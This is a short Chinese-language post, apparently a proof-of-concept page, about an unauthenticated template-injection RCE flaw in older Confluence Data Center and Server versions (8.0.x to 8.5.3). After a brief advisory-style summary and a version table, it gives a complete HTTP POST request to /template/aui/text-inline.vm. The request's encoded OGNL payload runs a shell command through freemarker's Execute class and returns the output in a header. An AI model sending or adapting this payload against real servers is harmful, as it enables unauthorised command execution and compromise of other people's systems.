旧版本的 Confluence Data Center 和 Server 中存在一个模板注入漏洞,允许未经身份验证的攻击者在受影响实例上实现 RCE。使用受影响版本的客户必须立即采取行动。大多数最新受支持的 Confluence Data Center 和 Server 版本不受此漏洞影响,因为该漏洞在常规版本更新中最终得到了缓解。但是,Atlassian 建议客户注意安装最新版本,以保护其实例免受 Atlassian 一月安全公告中概述的非关键漏洞的影响。
| 产品 | 受影响版本 |
|---|
| Confluence Data Center 和 Server | 8.0.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
